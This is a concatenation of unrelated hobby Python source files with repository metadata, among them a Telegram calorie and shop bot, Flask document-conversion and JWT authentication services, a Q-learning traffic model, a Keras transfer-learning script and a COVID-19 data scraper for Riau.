import cv2
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torchvision
import torchvision.transforms as transforms
import time
import pandas as pd
# import json
from IPython.display import clear_output
torch.set_printoptions(linewidth=120)
torch.set_grad_enabled(True)
face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
class Network(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(in_channels=1, out_channels=6, kernel_size=5)
self.conv2 = nn.Conv2d(in_channels=6, out_channels=12, kernel_size=5)
self.fc1 = nn.Linear(in_features=12*9*9, out_features=120)
self.fc2 = nn.Linear(in_features=120, out_features=60)
self.out = nn.Linear(in_features=60, out_features=7)
def forward(self, t):
t = self.conv1(t)
t = F.relu(t)
t = F.max_pool2d(t, kernel_size=2, stride=2)
t = self.conv2(t)
t = F.relu(t)
t = F.max_pool2d(t, kernel_size=2, stride=2)
t = t.reshape(-1, 12*9*9)
t = self.fc1(t)
t = F.relu(t)
t = self.fc2(t)
t = F.relu(t)
t = self.out(t)
return t
class webopencv(object):
def __init__(self):
pass
def process(self):
model = torch.load("modelResults.pt")
torch.save(model.state_dict(), "model_state_dict.pt")
w = webopencv()
w.process()
| jain-aniket/attentiveness-flask | testtorchloading.py | testtorchloading.py | py | 1,388 | python | en | code | 0 | github-code | 36 |
1409824498 | import threading
import time
from subprocess import Popen, PIPE, CalledProcessError
from redis import Redis
from rq import Queue
import sys
import os
import shutil
# Connect to Redis
redis_conn = Redis(host='localhost', port=6379, db=0)
# Create an RQ queue
queue = Queue(connection=redis_conn)
def read_output(pipe, task_id):
job = queue.fetch_job(task_id)
output = '' # Initialize an empty string to store the output
for line in iter(pipe.readline, ''):
output += line # Accumulate the output as it is generated
sys.stderr.flush()
# Save the output to job.meta as it is generated
job.meta['progress'] = output
job.save_meta()
def task(task_id, input_path, output_path, model_name, tta=False):
try:
upscale_command = [
'./upscale/upscayl',
'-i', input_path,
'-o', output_path,
'-n', model_name
]
if tta:
upscale_command.append("-x")
with Popen(upscale_command, stderr=PIPE, stdout=PIPE, bufsize=1, universal_newlines=True) as p:
stdout_thread = threading.Thread(target=read_output, args=(p.stdout, task_id))
stderr_thread = threading.Thread(target=read_output, args=(p.stderr, task_id))
stdout_thread.start()
stderr_thread.start()
# Wait for the subprocess to complete
p.wait()
# Wait for the output threads to finish
stdout_thread.join()
stderr_thread.join()
if p.returncode != 0:
raise CalledProcessError(p.returncode, p.args)
except Exception as e:
raise e
finally:
if os.path.exists(input_path):
shutil.rmtree(os.path.dirname(input_path))
| ASparkOfFire/fastapi-rq-example | job.py | job.py | py | 1,772 | python | en | code | 0 | github-code | 36 |
40097713775 | import flask
import os
import zipfile
from docx.api import Document
from flask import request, jsonify
from flask_s3 import *
from io import BytesIO
from werkzeug.utils import secure_filename
import boto3
from s3_credential import *
import pypandoc
from bs4 import BeautifulSoup
from datetime import datetime
import json
import uuid
import time
s3 = FlaskS3()
app = flask.Flask(__name__)
app.config["DEBUG"] = True
app.config['UPLOAD_FOLDER'] = os.path.join('word','media')
app.config['FLASKS3_BUCKET_NAME'] = os.environ.get("AWS_BUCKET_NAME")
app.config['AWS_ACCESS_KEY_ID'] = os.environ.get("AWS_ACCESS_KEY_ID")
app.config['AWS_SECRET_ACCESS_KEY'] = os.environ.get("AWS_SECRET_ACCESS_KEY")
app.config['FLASKS3_BUCKET_DOMAIN'] = 's3.ap-south-1.amazonaws.com'
s3.init_app(app)
s3_boto = boto3.client('s3')
s3_res = boto3.resource("s3")
buck = s3_res.Bucket(os.environ.get("AWS_BUCKET_NAME"))
def generate_unique_name(length=10):
timestamp_got = datetime.now().strftime("%s")
unique_name = f"img{timestamp_got}.png"
return unique_name
def get_url(key):
url = s3_boto.generate_presigned_url(
ClientMethod='get_object',
Params={
'Bucket': os.environ.get("AWS_BUCKET_NAME"),
'Key': key
},
ExpiresIn=9600)
return url
@app.route("/upload-document",methods=["POST"])
def uploadDocument():
document = request.files.get("file",False)
if(document):
memfile = BytesIO()
document.save(memfile)
document = Document(memfile)
tables = document.tables
z = zipfile.ZipFile(memfile)
z.extractall()
all_files = z.namelist()
# print(all_files)
images = filter(lambda x: x.startswith('/word/media/'), all_files)
# return "yo"
rels = {}
real_name = {}
for r in document.part.rels.values():
if isinstance(r._target, docx.parts.image.ImagePart):
file_location = '/word/media/'+secure_filename(generate_unique_name())
fbinary = open(f'word/media/{os.path.basename(r._target.partname)}',"rb")
file_url_upload = os.path.join("/media/docimages",os.path.basename(file_location))
s=buck.put_object(Body=fbinary.read(),Key=file_url_upload)
rels[r.rId] = get_url(file_url_upload)
# print(s.generate_presigned_url(expires_in=0))
real_name[r.rId] = os.path.basename(r._target.partname)
# Data will be a list of rows represented as dictionaries
# containing each row's data.
data = []
keys = None
topic_id = ''
get_string = ""
#print(dir(table.columns))
for table in tables :
tr = {}
for i, row in enumerate(table.rows):
tr[row.cells[0].text] = ''
for paragraph in row.cells[1].paragraphs:
if(row.cells[0].text == 'Topic ID'):
topic_id = row.cells[1].text
for rId in rels:
if rId in paragraph._p.xml:
z.extract('word/media/'+real_name[rId],os.getcwd())
tr[row.cells[0].text]+=f'<img src="{rels[rId]}">'
if(row.cells[0].text == 'Problem Statement' or row.cells[0].text == 'Correct Answer Explanation') :
# print(paragraph.font.superscripipt)
print(paragraph._element.xml)
get_string+=paragraph._element.xml+"\n"
tr[row.cells[0].text]+='<p>'+paragraph.text+'</p>'
# print(paragraph.style.font.superscript)
else :
tr[row.cells[0].text]+=paragraph.text
data.append(tr)
allData = {}
allData['document'] = {}
allData['document']['Topic ID'] = topic_id
allData['document']['questions'] = data
with open("output.xml",'w') as file:
file.write(get_string)
return jsonify(allData)
def arrangeData(data,variable,image_hash_data):
if(data[1].findChild()):
if(len(data[1].findAll("img"))):
img_data = data[1].findAll("img")
for i,img in enumerate(img_data):
if(image_hash_data.get(os.path.basename(img["src"]))):
object_url = "https://app.xxxx.com/{1}/{2}".format(
s3_boto.get_bucket_location(Bucket='xxxx-media')['LocationConstraint'],
'media/docimages',image_hash_data.get(os.path.basename(img["src"])))
img_data[i]["src"] = object_url
variable[data[0].text] = str(data[1]).replace("<td>", "").replace("</td>", "")
else:
variable[data[0].text] = data[1].text
# print(type(data[1]))
# print(data[1])
else:
variable[data[0].text] = data[1].text
return variable
def preprocessData(data,image_hash_data):
tr_data = data.findAll("tr")
result_recv = {}
for i,tr in enumerate(tr_data):
result = tr_data[i]["class"]
if(result[0]!="header"):
all_data = tr_data[i].findAll("td")
# print(all_data[0],all_data[1])
if(len(all_data)):
arrangeData(all_data, result_recv,image_hash_data)
else:
all_data = tr.findAll("th")
arrangeData(all_data, result_recv,image_hash_data)
return result_recv
@app.route("/api/json",methods=["POST"])
def preprocessDocFunc():
document = request.files.get("file",False)
image_hash_data = {}
errros_arr = []
all_data = []
topic_id = ""
if(document):
try:
document.save("static/predoc.docx")
# document = Document(memfile)
# tables = document.tables
real_file_path = "static/predoc.docx"
real_file_stream = open(real_file_path,"rb")
z = zipfile.ZipFile(real_file_stream)
z.extractall()
all_files = z.namelist()
# images_data = filter(lambda x:x.startwith("word/media"), all_files)
for i in all_files:
if(i.startswith("word/media")):
#unique_name = secure_filename(generate_unique_name())
unique_name = secure_filename(str(time.time())+uuid.uuid4().hex)
fbinary = open(os.path.join(os.getcwd(),f'word/media/{os.path.basename(i)}'),"rb")
file_url_upload = os.path.join("media/docimages",unique_name)
s=buck.put_object(Body=fbinary.read(),Key=file_url_upload)
image_hash_data[os.path.basename(i)] = unique_name
html = pypandoc.convert_file(real_file_path, 'html',extra_args=['--webtex'])
parser = BeautifulSoup(html,"html.parser").findAll("table")
topic_id = (parser[0].find(text="Topic ID").findNext("th") if parser[0].find(text="Topic ID").findNext("th") else parser[0].find(text="Topic ID").findNext("td")).text
all_data = [preprocessData(tdata,image_hash_data) for tdata in parser if preprocessData(tdata,image_hash_data)]
except Exception as e:
errros_arr.append(str(e))
return {
"document":{
"Topic ID":topic_id,
"questions":all_data
},
"errors":errros_arr
}
@app.route("/api/html",methods=["POST"])
def htmlresponse():
document = request.files.get("file",False)
image_hash_data = {}
errros_arr = []
all_data = []
topic_id = ""
if(document):
try:
document.save("static/predoc.docx")
# document = Document(memfile)
# tables = document.tables
real_file_path = "static/predoc.docx"
real_file_stream = open(real_file_path,"rb")
z = zipfile.ZipFile(real_file_stream)
z.extractall()
all_files = z.namelist()
# images_data = filter(lambda x:x.startwith("word/media"), all_files)
for i in all_files:
if(i.startswith("word/media")):
unique_name = secure_filename(str(time.time())+uuid.uuid4().hex)
#print(unique_name)
#exit()
fbinary = open(os.path.join(os.getcwd(),f'word/media/{os.path.basename(i)}'),"rb")
file_url_upload = os.path.join("media/docimages",unique_name)
s=buck.put_object(Body=fbinary.read(),Key=file_url_upload)
image_hash_data[os.path.basename(i)] = unique_name
time.sleep(1)
html = pypandoc.convert(real_file_path,'html',extra_args=['--mathjax'])
parser = BeautifulSoup(html,"html.parser").findAll("img")
img_data = parser
resp = str(html)
for i,img in enumerate(img_data):
if(image_hash_data.get(os.path.basename(img["src"]))):
old_img = img_data[i]['src']
object_url = "https://app.xxxx.com/{1}/{2}".format(
s3_boto.get_bucket_location(Bucket='xxxx-media')['LocationConstraint'],
'media/docimages',image_hash_data.get(os.path.basename(img["src"])))
resp = resp.replace(old_img,object_url )
except Exception as e:
errros_arr.append(str(e))
return resp
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
app.run() | ActiKnow/docx-to-html-json | index.py | index.py | py | 9,727 | python | en | code | 0 | github-code | 36 |
8604753979 | import telebot
from telebot import types
import config
import values
import sqlite3
# Registration BOT using TOKEN
bot = telebot.TeleBot(config.TOKEN)
# Registration DB
db = sqlite3.connect('DB/catalog.db', check_same_thread=False)
sql = db.cursor()
# For reading USER's HEIGHT
def height(message, word):
weight = message.text
msg = bot.send_message(message.chat.id, 'Введи свой рост (в сантиметрах):\n')
bot.register_next_step_handler(msg, calc, (weight, word))
# For reading AGE or printing INDEX of body mass
def calc(message, lis):
h = int(message.text) / 100
w = int(lis[0])
if lis[1] == 'Калории':
msg = bot.send_message(message.chat.id, f'Введи свой возраст:\n')
bot.register_next_step_handler(msg, age, (h * 100, w))
elif lis[1] == 'Индекс':
bot.send_photo(message.chat.id, photo=open('vals.png', 'rb'),
caption=f'Ваш индекс массы тела:\n{round(w / (h ** 2), 2)}',
parse_mode='html')
# For printing necessary number of calories and reading about type of activity
def age(message, data):
w = data[1] * 9.99
h = data[0] * 6.25
a = int(message.text) * 4.92
pre_result = round(w + h - a)
bot.send_message(message.chat.id, f'<em><b>{pre_result}</b></em> — '
f'Столько калорий необходимо вам для того, '
f'чтобы просто существовать.',
parse_mode='html')
msg = bot.send_message(message.chat.id, values.description, parse_mode='html')
bot.register_next_step_handler(msg, activity, pre_result)
# printing necessary number of calories
def activity(message, res):
result = round(res * values.values[message.text])
bot.send_message(message.chat.id, f'Для похудения необходимо <b>{result - 400} -- {result - 200}</b> калорий\n'
f'Необходимо потреблять <b>{result}</b>'
f' калорий в день чтобы нормально восстанавливаться\n'
f'Для набора массы необходимо <b>{result + 200} -- {result + 400}</b> калорий\n',
parse_mode='html')
# Read data from DB (item shop) using user_id
def read_from_items_db(user_id):
data = [el for el in sql.execute(f"SELECT * FROM items WHERE rowid = {values.user_list[str(user_id)][0]}")]
# print(data)
return data
# Creating keyboard for card (below)
def create_markup_for_card():
keyboard = types.InlineKeyboardMarkup()
key_1 = types.InlineKeyboardButton(text='⬅ Предыдущий товар', callback_data='previous')
key_2 = types.InlineKeyboardButton(text='Следующий товар ➡', callback_data='next')
key_3 = types.InlineKeyboardButton(text='🗑 Добавить в корзину', callback_data='add_in_basket')
keyboard.row(key_1, key_2)
keyboard.add(key_3)
return keyboard
# Send message with data about item (card of item)
def send_item(message):
data = read_from_items_db(message.from_user.id)[0]
markup = create_markup_for_card()
if data[4] - data[3] != 0:
cost = f'{round(data[3])} - {round(data[4])}'
else:
cost = round(data[3])
try:
msg_id = message.chat.id
except:
msg_id = message.message.chat.id
bot.send_photo(msg_id,
open(data[5], 'rb'),
caption=f'\n<b>{data[2]}</b>\n\n'
f'Цена: <b>{cost} RUB</b>\n\n'
f'<em>Описание: {data[6].capitalize()}</em>\n'
f'\nВес: {round(data[-1] * 1000)} g.',
parse_mode='html',
reply_markup=markup)
# Is User in values.user_list
def test_of_being_in_list(msg_data):
if not (str(msg_data.from_user.id) in values.user_list):
values.iter_var_changer(msg_data.from_user.id, 1, True)
# How many notes in DB
def count_of_strings():
sql.execute("SELECT rowid FROM items")
return len(sql.fetchall())
# Getting data from DB about item in USER's basket
def get_data_from_basket(message):
user_basket = values.user_list[str(message.from_user.id)][1]
message_text = '\n'
for el, count in user_basket.items():
data = sql.execute(f"SELECT name FROM items WHERE rowid = {int(el)}").fetchone()[0]
message_text += f'\n• {data} = <b>{count} шт.</b>\n'
return message_text
def create_markup_for_basket(message):
try:
msg_id = message.id
except:
msg_id = message.message.id
keyboard = types.InlineKeyboardMarkup()
key_1 = types.InlineKeyboardButton(text='❌ Очистить корзину ❌', callback_data=f'clear_basket_{msg_id}')
key_2 = types.InlineKeyboardButton(text='📋 Оформить заказ ', callback_data='create_order')
keyboard.row(key_1)
keyboard.row(key_2)
return keyboard
def response_for_check_basket(message):
try:
msg_id = message.id
chat_id = message.chat.id
except:
msg_id = message.message.id
chat_id = message.message.chat.id
text = get_data_from_basket(message)
if text == '\n':
keyboard = types.InlineKeyboardMarkup()
keyboard.add(types.InlineKeyboardButton(text='OK', callback_data=f'ok_{msg_id}'))
text = 'Корзина пуста!'
else:
keyboard = create_markup_for_basket(message)
bot.send_message(chat_id=chat_id,
text=f'{text}',
parse_mode='html',
reply_markup=keyboard)
"""
###########################################################
------ Starting of actions with different 'handlers' ------
###########################################################
"""
@bot.message_handler(commands=['calc'])
def characteristics(message):
mark = types.ReplyKeyboardMarkup(resize_keyboard=True)
mark.row(
'Индекс',
'Калории',
)
bot.send_message(message.chat.id, 'Что вы хотите узнать?', reply_markup=mark)
@bot.message_handler(commands=['hello', 'hi', 'sup'])
def greeting(message):
msg = bot.send_photo(message.chat.id, open('photos/Rock.jpg', 'rb'))
keyboard = types.InlineKeyboardMarkup()
key_1 = types.InlineKeyboardButton(text='Привет', callback_data=f'hi_{msg.id}')
key_2 = types.InlineKeyboardButton(text='Пока', callback_data=f'bye_{msg.id}')
keyboard.row(key_1, key_2)
msg = bot.send_message(message.chat.id,
f'Перед тобой бот для подсчета калорий'
f' <b>{bot.get_me().first_name}</b>',
parse_mode='html',
reply_markup=keyboard)
@bot.message_handler(commands=['market', 'shop', 'store'])
def market(message):
menu = types.ReplyKeyboardMarkup(resize_keyboard=True)
menu.row(
'Каталог',
'Корзина'
)
# menu.add('')
bot.send_message(message.chat.id, 'Добро пожаловать в магазин!\nИспользуйте меню для навигации: ',
reply_markup=menu)
test_of_being_in_list(message)
@bot.message_handler(content_types=['text'])
def handler(message):
if message.text == 'Индекс' or message.text == 'Калории':
word = message.text
msg = bot.send_message(message.chat.id, 'Введи свой вес:\n')
bot.register_next_step_handler(msg, height, word)
elif message.text == 'Каталог':
test_of_being_in_list(message)
send_item(message)
elif message.text == 'Корзина':
response_for_check_basket(message)
@bot.callback_query_handler(func=lambda call: True)
def callback(call):
test_of_being_in_list(call)
data = call.data.split('_')
if data[0] == 'hi' or data[0] == 'bye':
bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.id,
text=f'{values.for_greet[data[0]]} {call.from_user.first_name}!')
bot.delete_message(call.message.chat.id, data[1])
if call.data == 'next':
index = values.user_list[str(call.from_user.id)]
if index[0] < count_of_strings():
values.iter_var_changer(call.from_user.id, index[0] + 1)
else:
values.iter_var_changer(call.from_user.id, 1)
send_item(call)
elif call.data == 'previous':
index = values.user_list[str(call.from_user.id)]
if index[0] > 1:
values.iter_var_changer(call.from_user.id, index[0] - 1)
else:
values.iter_var_changer(call.from_user.id, count_of_strings())
send_item(call)
elif call.data == 'add_in_basket':
index = values.user_list[str(call.from_user.id)]
try:
count = values.user_list[str(call.from_user.id)][1][str(index[0])]
values.add_item(call.from_user.id, index[0], count + 1)
except Exception as ex:
# print(f'Firstly!{"#" * 10}Exception: {ex}')
values.add_item(call.from_user.id, index[0], 1)
bot.answer_callback_query(callback_query_id=call.id, text='\nТовар добавлен в корзину!\n')
# for user, data in values.user_list.items():
# print(f' |||{user} --- {data}|||')
elif data[0] == 'ok':
# bot.edit_message_text(chat_id=call.message.chat.id, text='Продолжайте покупки!', message_id=call.message.id)
try:
bot.delete_message(chat_id=call.message.chat.id, message_id=call.message.id)
bot.delete_message(chat_id=call.message.chat.id, message_id=data[1])
except Exception as ex:
print(ex)
elif data[0] + '_' + data[1] == 'clear_basket':
values.clear_basket(call.from_user.id)
try:
bot.delete_message(call.message.chat.id, data[2])
bot.delete_message(call.message.chat.id, call.message.id)
except Exception as ex:
print(ex)
bot.answer_callback_query(call.id)
bot.polling(none_stop=True)
| Abrahamlink/body-bot | bot.py | bot.py | py | 10,450 | python | en | code | 0 | github-code | 36 |
2767696238 | from gym import Env
from gym.spaces import Discrete, Box
import numpy as np
import random
import numpy as np
from functions import Junction
env = Junction() # creating the enviornment
action_size = env.action_space.n
print("Action size ", action_size)
state_size = env.observation_space.n
print("State size ", state_size)
qtable = np.zeros((state_size, action_size))
print(qtable)
total_episodes = 80000 # total episodes
total_test_episodes = 100 # total test episodes
max_steps = 100 # tax steps per episode
learning_rate = 0.6 # learning rate
gamma = 0.6 # liscounting rate
# Exploration parameters
epsilon = 1.0 # exp rate
max_epsilon = 1.0 # Exploration probability at start
min_epsilon = 0.01 # minimum exploration probability
decay_rate = 0.01 # exponential decay rate for exploration
data_bef=[]
data_aft=[]
time_step=[]
flow_state=[]
def flow(state):
kj=1000
vf=22.22
flow = vf*(1-(state/kj))*state
return flow
def flow_data(k):
flow_state.append(flow(state))
def append_data_bef(before_state):
data_bef.append(before_state)
def append_data_aft(after_state):
data_aft.append(after_state)
def append_time_slot(t):
time_step.append(t)
def batch_time(current_action):
if current_action==0 or current_action==3 or current_action==6 or current_action==9:
t=15
elif current_action==1 or current_action==4 or current_action==7 or current_action==10:
t=30
elif current_action==2 or current_action==5 or current_action==8 or current_action==11:
t=45
else:
t=0
return t
# 2 For life or until learning is stopped
for episode in range(total_episodes):
# Reset the environment
state = env.reset()
step = 0
done = False
for step in range(max_steps):
# choosing an action a in the current world state s
## randomize a number
exp_exp_tradeoff = random.uniform(0,1)
## if this number > greater than epsilon then exploitation (taking the biggest Q value for this state)
if exp_exp_tradeoff > epsilon:
action = np.argmax(qtable[int(state),:])
# else random choice
else:
action = env.action_space.sample()
# Take the action a and observe the outcome state(s') and reward (r)
new_state, reward, done, info = env.step(action)
# Update Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
qtable[int(state), action] = qtable[int(state), action] + learning_rate * (reward + gamma *
np.max(qtable[int(new_state), :]) - qtable[int(state), action])
# Our new state is state
state = new_state
# If done : finish episode
if done == True:
break
# reduce epsilon (because we need less and less exploration)
epsilon = min_epsilon + (max_epsilon - min_epsilon)*np.exp(-decay_rate*episode)
rewards = []
env.reset()
for episode in range(total_test_episodes):
state = env.reset()
step = 0
done = False
total_rewards = 0
#print("****************************************************")
#print("EPISODE ", episode)
for step in range(max_steps):
# UNCOMMENT IT IF YOU WANT TO SEE OUR AGENT PLAYING
# env.render()
# Take the action (index) that have the maximum expected future reward given that state
action = np.argmax(qtable[int(state),:])
append_time_slot(batch_time(action))
new_state, reward, done, info = env.step(action)
append_data_aft(new_state)
flow_data(flow(new_state))
total_rewards += reward
if done:
rewards.append(total_rewards)
print ("Score", total_rewards)
break
state = int(new_state)
env.close()
print ("Score over time: " + str(sum(rewards)/total_test_episodes))
#===========================================================================================================================
print(" ")
print(rewards)
print(" ")
print("--------------------------------------------------------------------------------------------------------------------")
print(time_step)
print(" ")
print("--------------------------------------------------------------------------------------------------------------------")
print(data_aft) # density after
print(" ")
print("--------------------------------------------------------------------------------------------------------------------")
print(flow_state)
#dict = {
## "den_aft" : data_aft
#}
#data = json.dumps(dict)
##with open("sample1.json", "w") as outfile:
# outfile.write(data)
| Shashwatbokhad/Traffic-light-control-using-Reinforcement-learning | rl_model.py | rl_model.py | py | 5,286 | python | en | code | 1 | github-code | 36 |
44396105133 | import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
import tensorflow_datasets as tfds
import os
if __name__ == '__main__':
tfds.disable_progress_bar()
train_ds, validation_ds, test_ds = tfds.load(
"cats_vs_dogs",
data_dir=os.path.expanduser("~/junk/"),
# Reserve 10% for validation and 10% for test
split=[
tfds.Split.TRAIN.subsplit(tfds.percent[:40]),
tfds.Split.TRAIN.subsplit(tfds.percent[40:50]),
tfds.Split.TRAIN.subsplit(tfds.percent[50:60])
],
as_supervised=True, # Include labels
)
print("Number of training samples: %d" % tf.data.experimental.cardinality(train_ds))
print("Number of validation samples: %d" % tf.data.experimental.cardinality(validation_ds))
print("Number of test samples: %d" % tf.data.experimental.cardinality(test_ds))
size = (150, 150)
train_ds = train_ds.map(lambda x, y: (tf.image.resize(x, size), y))
validation_ds = validation_ds.map(lambda x, y: (tf.image.resize(x, size), y))
test_ds = test_ds.map(lambda x, y: (tf.image.resize(x, size), y))
batch_size = 32
train_ds = train_ds.cache().batch(batch_size).prefetch(buffer_size=10)
validation_ds = validation_ds.cache().batch(batch_size).prefetch(buffer_size=10)
test_ds = test_ds.cache().batch(batch_size).prefetch(buffer_size=10)
data_augmentation = keras.Sequential(
[
layers.experimental.preprocessing.RandomFlip("horizontal"),
layers.experimental.preprocessing.RandomRotation(0.1),
]
)
base_model = keras.applications.Xception(
weights="imagenet", # Load weights pre-trained on ImageNet.
input_shape=(150, 150, 3),
include_top=False, # Do not include the ImageNet classifier at the top.
)
base_model.trainable = False # Freeze the base_model
# Create new model on top
inputs = keras.Input(shape=(150, 150, 3))
x = data_augmentation(inputs)
# Pre-trained Xception weights requires that input be normalized from (0, 255) to a range (-1., +1.),
# the normalization layer does the following, outputs = (inputs - mean) / sqrt(var)
norm_layer = keras.layers.experimental.preprocessing.Normalization()
mean = np.array([127.5] * 3)
var = mean ** 2
x = norm_layer(x) # Scale inputs to [-1, +1]
norm_layer.set_weights([mean, var])
# The base model contains batchnorm layers.
# We want to keep them in inference mode when we unfreeze the base model for fine-tuning,
# so we make sure that the base_model is running in inference mode here.
x = base_model(x, training=False)
x = keras.layers.GlobalAveragePooling2D()(x)
x = keras.layers.Dropout(0.2)(x) # Regularize with dropout
outputs = keras.layers.Dense(1)(x)
model = keras.Model(inputs, outputs)
model.summary()
model.compile(
optimizer=keras.optimizers.Adam(),
loss=keras.losses.BinaryCrossentropy(from_logits=True),
metrics=[keras.metrics.BinaryAccuracy()],
)
"""train the top layer"""
epochs = 20
model.fit(train_ds, epochs=epochs, validation_data=validation_ds)
"""do a round of fine-tuning of the entire model"""
base_model.trainable = True
model.summary()
model.compile(
optimizer=keras.optimizers.Adam(1e-5), # Low learning rate for fine tuning
loss=keras.losses.BinaryCrossentropy(from_logits=True),
metrics=[keras.metrics.BinaryAccuracy()],
)
epochs = 10
model.fit(train_ds, epochs=epochs, validation_data=validation_ds)
| jk983294/morph | book/tensorflow/models/transfer.py | transfer.py | py | 3,632 | python | en | code | 0 | github-code | 36 |
25617944185 | import numpy as np
from bs4 import BeautifulSoup
import pandas as pd
import requests
import time
import json
from tomlkit import array
URL = "https://covid19.riau.go.id/pantauan_data_kasus"
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36'
}
FILEDIR = "./"
FILENAME = "covid19-data-riau"
start_time = time.time()
r = requests.get(URL, headers=HEADERS).text
soup = BeautifulSoup(r, "html.parser")
section_title = soup.find("div", class_="section-title").text.strip()
city_list = soup.find_all("a", attrs={"href": lambda txt: "corona.riau" in txt.lower()})
all_cases = soup.find_all("td", class_="text-right")
labels = soup.find_all("th", class_="text-center")
labels = [label.text.strip() for label in labels]
# print(labels)
cases = []
for i, case in enumerate(all_cases):
cases.append(case.text.strip())
cases = np.array(cases).reshape((len(city_list), len(labels[3:])))
# print(cases.shape)
# print(cases[0])
data = {}
for i, city in enumerate(city_list):
city_url = city["href"]
city = city.text.strip()
data[city] = {
# "city": city,
"city url": city_url,
"cases": {
"spesimen": dict(zip(labels[3:7], cases[i][:4])),
"suspek": dict(zip(labels[7:11], cases[i][4:8])),
"terkonfirmasi": dict(zip(labels[11:], cases[i][8:])),
}
}
# print(labels[3:])
# print(cases[i])
# break
# print(data[0])
with open("{}.json".format(FILENAME), "w", encoding="utf-8") as f:
json.dump(data, f, ensure_ascii=False, indent=4)
index = pd.Index([city.text.strip() for city in city_list])
columns = pd.MultiIndex.from_arrays(
(['spesimen']*4 + ['suspek']*4 + ['terkonfirmasi']*4, labels[3:])
)
df = pd.DataFrame(cases, index=index, columns=columns)
print(df.head(20))
df.to_csv("{}.csv".format(FILENAME), index=True)
print("Finish in %s.3f seconds." % (time.time()-start_time))
| mfalfafa/scrape-covid19-data-riau | scraper.py | scraper.py | py | 1,975 | python | en | code | 0 | github-code | 36 |
74431864103 | from fastapi import FastAPI
import requests
import uvicorn
app = FastAPI()
@app.get("/")
async def get_product():
req=requests.get("https://world.openfoodfacts.org/api/v0/product/3033491270864.json")
if req.status_code==200:
res=req.json()
return(res)
if __name__=='__main__':
uvicorn.run(app, host="127.0.0.1", port=8000) | apollineguerineau/TP5 | main.py | main.py | py | 352 | python | en | code | 0 | github-code | 36 |
74105436582 | import sqlite3
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import TfidfVectorizer
from datetime import datetime as dt
from sklearn.externals import joblib
start_time = dt.now()
# data loading
conn = sqlite3.connect("textarray.db")
cur = conn.cursor()
query = '''SELECT * from train'''
cur.execute(query)
y_train, names, descs, X_train = [], [], [], []
for c, n, d, w in cur.fetchall():
y_train.append(c)
names.append(n)
descs.append(d)
X_train.append(w)
vectorizer = joblib.load('vect.pkl')
XtrV = vectorizer.fit_transform(X_train).toarray() # X-Train-Vectorized
RF = RandomForestClassifier(n_estimators=100,
max_depth=9,
n_jobs=4)
RF.fit(XtrV, y_train)
joblib.dump(RF, 'RF.pkl', compress=9)
# validation on the test set
query = '''SELECT * from test'''
cur.execute(query)
y_test, names, descs, X_test = [], [], [], []
for c, n, d, w in cur.fetchall():
y_test.append(c)
names.append(n)
descs.append(d)
X_test.append(w)
test_size = len(y_test)
XteV = vectorizer.transform(X_test).toarray() # X-Test-Vectorized
pred = RF.predict(XteV)
for i in range(test_size):
cur.execute('''UPDATE test SET cat=? WHERE name=?''', (pred[i], names[i]))
print('Estimated: {0}'.format(dt.now()-start_time))
| kirilenkobm/ML_examples | RandomForestClf.py | RandomForestClf.py | py | 1,335 | python | en | code | 0 | github-code | 36 |
30838346418 | from flask import Blueprint, current_app, request, make_response, jsonify
from ..models.User import User
from flask_jwt_extended import (
create_access_token,
create_refresh_token,
jwt_required,
)
import traceback
auth_bp = Blueprint('auth_bp', __name__)
# registrater user
@auth_bp.route('/user/registration', methods=['POST'])
def deo_registration():
try:
if request.is_json:
data = request.get_json(force=True)
else:
data = request.form
columns = ["username","first_name","surname","HIV_status","Phone_number"]
for column in columns:
if column not in data:
return make_response(jsonify({'message': f'{column} is missing from payload!'}), 400)
existing_user = User.query.filter(User.username == data['username']).first()
if existing_user:
return make_response(jsonify({'message': 'Username already exists!'}), 400)
if len(data['Phone_number']) > 15 or len(data['Phone_number']) < 10:
return make_response(jsonify({'message': 'Phone number should be between 10-15 digits!'}), 400)
# create new User
new_user = User(
username = data['username'],
first_name = data['first_name'],
password = User.hash_password(data['password']),
surname = data['surname'],
age = data['age'],
HIV_status = data['HIV_status'],
Phone_number = data['Phone_number']
)
new_user.save()
# access_token = create_access_token(identity = data['username'])
# refresh_token = create_refresh_token(identity = data['username'])
resp = jsonify({'message':'Account created successfully'})
return make_response(resp, 201)
except:
return make_response(str(traceback.format_exc()),500)
# user login
@auth_bp.route('/user/login', methods=['POST'])
def login():
try:
data = request.get_json(force=True)
username = data['username']
user = User.query.filter(User.username==username).first()###
password = data['password']
access_token = create_access_token(identity = data['username'])
refresh_token = create_refresh_token(identity = data['username'])
if not user:
return make_response(jsonify({"message":"Account doesn't exist"}),400)
if not user.is_password_valid(password):
return make_response(jsonify({"message":"Invalid credentials"}),400)
resp = jsonify({'access_token':access_token,
'refresh_token':refresh_token,
'message':'Login Successful'
})
return make_response(resp,200)
except:
return make_response(str(traceback.format_exc()),500)
# get all system users
@auth_bp.route('/user/get_users', methods=['GET'])
@jwt_required()
def get_all_users():
try:
num_of_items = current_app.config['NUM_OF_ITEMS_PER_PAGE']
page = request.args.get('page', 1, type=int)
pagination_info = {}
user_data = User.query.order_by(User.user_id.desc()).paginate(page, num_of_items, False)
pagination_info['next_page'] = user_data.next_num
pagination_info['prev_page'] = user_data.prev_num
pagination_info['current_page'] = user_data.page
pagination_info['no_of_pages'] = user_data.pages
pagination_info['items_per_page'] = user_data.per_page
pagination_info['total_items'] = user_data.total
users = [z.serialise() for z in user_data.items]
return make_response(jsonify({"data": users, "info": pagination_info}),200)
except:
return make_response(str(traceback.format_exc()),500)
# get user by id
@auth_bp.route('/user/get_user/<int:user_id>', methods=['GET'])
@jwt_required()
def get_user(user_id):
try:
user = User.query.get(user_id)
return make_response(jsonify(user.serialise()),200)
except:
return make_response(str(traceback.format_exc()),500)
